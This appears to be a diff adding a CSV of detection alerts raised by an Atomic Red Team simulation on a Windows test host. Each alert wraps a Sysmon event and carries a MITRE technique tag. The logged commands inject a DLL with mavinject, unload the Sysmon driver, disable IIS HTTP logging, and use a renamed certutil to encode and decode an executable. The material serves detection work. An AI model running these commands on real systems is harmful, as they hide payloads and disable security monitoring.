+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c "at 13:20 /interactive cmd"
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563548264.283188,2019-07-19T18:57:44.283188+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4080
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:57:16.531
+ 747F3D96-DA4C-5D31-0000-001077603D00
+ 6172
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563548236.552097,2019-07-19T18:57:16.552097+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c .\bin\T1055.exe ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4079
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:57:16.477
+ 747F3D96-DA4C-5D31-0000-0010655D3D00
+ 2596
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c .\bin\T1055.exe
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1179] Hooking detected,1563548236.496455,2019-07-19T18:57:16.496455+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\mavinject.exe ) through command line ( "C:\Windows\system32\mavinject.exe" 3912 /INJECTRUNNING C:\AtomicRedTeam\atomics\T1055\src\x64\T1055.dll ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4078
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:57:15.754
+ 747F3D96-DA4B-5D31-0000-0010CB413D00
+ 2604
+ C:\Windows\System32\mavinject.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Microsoft Application Virtualization Injector
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\mavinject.exe" 3912 /INJECTRUNNING C:\AtomicRedTeam\atomics\T1055\src\x64\T1055.dll
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=3627AD593F3A956FA07382914B52AAB5CE98C817,MD5=72D5E2A3FF5D88C891E0DF1AA28B6422,SHA256=ABB99F7CFD3E9EB294501AAFA082A8D4841278CC39A4FB3DFF9942CA1F71A139,IMPHASH=96A5873241D90136570C05E55F0B5B2A
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563548235.776993,2019-07-19T18:57:15.776993+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4077
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:57:14.972
+ 747F3D96-DA4A-5D31-0000-00107A2C3D00
+ 2584
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563548234.991615,2019-07-19T18:57:14.991615+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "C:\Windows\System32\inetsrv\appcmd.exe set config " "Default /section:httplogging /dontLog:true" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4076
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:57:14.928
+ 747F3D96-DA4A-5D31-0000-00106C293D00
+ 4056
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c "C:\Windows\System32\inetsrv\appcmd.exe set config " "Default /section:httplogging /dontLog:true"
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563548234.944276,2019-07-19T18:57:14.944276+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4075
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:57:14.745
+ 747F3D96-DA4A-5D31-0000-0010EE223D00
+ 1012
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563548234.758535,2019-07-19T18:57:14.758535+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "fltmc.exe unload SysmonDrv" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4074
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:57:14.696
+ 747F3D96-DA4A-5D31-0000-0010C21F3D00
+ 3976
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c "fltmc.exe unload SysmonDrv"
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563548234.715974,2019-07-19T18:57:14.715974+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4073
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:57:04.529
+ 747F3D96-DA40-5D31-0000-0010E16B3C00
+ 264
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563548224.41285,2019-07-19T18:57:04.412850+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c C:\Users\IEUser\AppData\Local\Temptcm.tmp -decode c:\file.exe file.txt ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4069
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:57:04.346
+ 747F3D96-DA40-5D31-0000-0010565D3C00
+ 3932
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ cmd.exe /c C:\Users\IEUser\AppData\Local\Temptcm.tmp -decode c:\file.exe file.txt
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-DA40-5D31-0000-0010CF5A3C00
+ 4336
+ C:\Windows\System32\cmd.exe
+ "C:\Windows\system32\cmd.exe" /c "cmd.exe /c %temp%tcm.tmp -decode c:\file.exe file.txt"
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563548224.361122,2019-07-19T18:57:04.361122+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "cmd.exe /c %%temp%%tcm.tmp -decode c:\file.exe file.txt" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4068
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:57:04.316
+ 747F3D96-DA40-5D31-0000-0010CF5A3C00
+ 4336
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c "cmd.exe /c %%temp%%tcm.tmp -decode c:\file.exe file.txt"
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563548224.333864,2019-07-19T18:57:04.333864+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c copy C:\Windows\\system32\\certutil.exe C:\Users\IEUser\AppData\Local\Temptcm.tmp ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4067
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:57:04.256
+ 747F3D96-DA40-5D31-0000-0010B1553C00
+ 5168
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ cmd.exe /c copy C:\Windows\\system32\\certutil.exe C:\Users\IEUser\AppData\Local\Temptcm.tmp
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-DA40-5D31-0000-00106A543C00
+ 6572
+ C:\Windows\System32\cmd.exe
+ "C:\Windows\system32\cmd.exe" /c "cmd.exe /c copy %windir%\\system32\\certutil.exe %temp%tcm.tmp"
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563548224.294575,2019-07-19T18:57:04.294575+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "cmd.exe /c copy %%windir%%\\system32\\certutil.exe %%temp%%tcm.tmp" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4066
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:57:04.236
+ 747F3D96-DA40-5D31-0000-00106A543C00
+ 6572
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c "cmd.exe /c copy %%windir%%\\system32\\certutil.exe %%temp%%tcm.tmp"
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563548224.270645,2019-07-19T18:57:04.270645+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4065
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:57:03.938
+ 747F3D96-DA3F-5D31-0000-0010813E3C00
+ 7140
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,1563548224.210561,2019-07-19T18:57:04.210561+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\certutil.exe) with commandline ( certutil.exe -decode file.txt c:\file.exe)",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4064
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:57:03.818
+ 747F3D96-DA3F-5D31-0000-001022323C00
+ 6888
+ C:\Windows\System32\certutil.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ CertUtil.exe
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ certutil.exe -decode file.txt c:\file.exe
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4
+ 747F3D96-DA3F-5D31-0000-0010562E3C00
+ 4020
+ C:\Windows\System32\cmd.exe
+ "C:\Windows\system32\cmd.exe" /c "certutil.exe -decode file.txt c:\file.exe"
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1140] Deobfuscate/Decode Files or Information,1563548224.210561,2019-07-19T18:57:04.210561+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\certutil.exe ) through command line ( certutil.exe -decode file.txt c:\file.exe ) tried decoding file or information,1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4064
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:57:03.818
+ 747F3D96-DA3F-5D31-0000-001022323C00
+ 6888
+ C:\Windows\System32\certutil.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ CertUtil.exe
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ certutil.exe -decode file.txt c:\file.exe
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4
+ 747F3D96-DA3F-5D31-0000-0010562E3C00
+ 4020
+ C:\Windows\System32\cmd.exe
+ "C:\Windows\system32\cmd.exe" /c "certutil.exe -decode file.txt c:\file.exe"
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1563548224.210561,2019-07-19T18:57:04.210561+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\certutil.exe ) through command line ( certutil.exe -decode file.txt c:\file.exe ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4064
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:57:03.818
+ 747F3D96-DA3F-5D31-0000-001022323C00
+ 6888
+ C:\Windows\System32\certutil.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ CertUtil.exe
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ certutil.exe -decode file.txt c:\file.exe
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4
+ 747F3D96-DA3F-5D31-0000-0010562E3C00
+ 4020
+ C:\Windows\System32\cmd.exe
+ "C:\Windows\system32\cmd.exe" /c "certutil.exe -decode file.txt c:\file.exe"
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563548223.974754,2019-07-19T18:57:03.974754+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "certutil.exe -decode file.txt c:\file.exe" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4063
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:57:03.786
+ 747F3D96-DA3F-5D31-0000-0010562E3C00
+ 4020
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c "certutil.exe -decode file.txt c:\file.exe"
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,1563548223.961276,2019-07-19T18:57:03.961276+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\certutil.exe) with commandline ( certutil.exe -encode c:\file.exe file.txt)",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4062
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:57:03.261
+ 747F3D96-DA3F-5D31-0000-00109E193C00
+ 1260
+ C:\Windows\System32\certutil.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ CertUtil.exe
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ certutil.exe -encode c:\file.exe file.txt
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4
+ 747F3D96-DA3F-5D31-0000-00104C173C00
+ 4832
+ C:\Windows\System32\cmd.exe
+ "C:\Windows\system32\cmd.exe" /c "certutil.exe -encode c:\file.exe file.txt"
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1563548223.961276,2019-07-19T18:57:03.961276+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\certutil.exe ) through command line ( certutil.exe -encode c:\file.exe file.txt ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4062
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:57:03.261
+ 747F3D96-DA3F-5D31-0000-00109E193C00
+ 1260
+ C:\Windows\System32\certutil.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ CertUtil.exe
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ certutil.exe -encode c:\file.exe file.txt
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4
+ 747F3D96-DA3F-5D31-0000-00104C173C00
+ 4832
+ C:\Windows\System32\cmd.exe
+ "C:\Windows\system32\cmd.exe" /c "certutil.exe -encode c:\file.exe file.txt"
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563548223.309488,2019-07-19T18:57:03.309488+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "certutil.exe -encode c:\file.exe file.txt" ),1,"
+
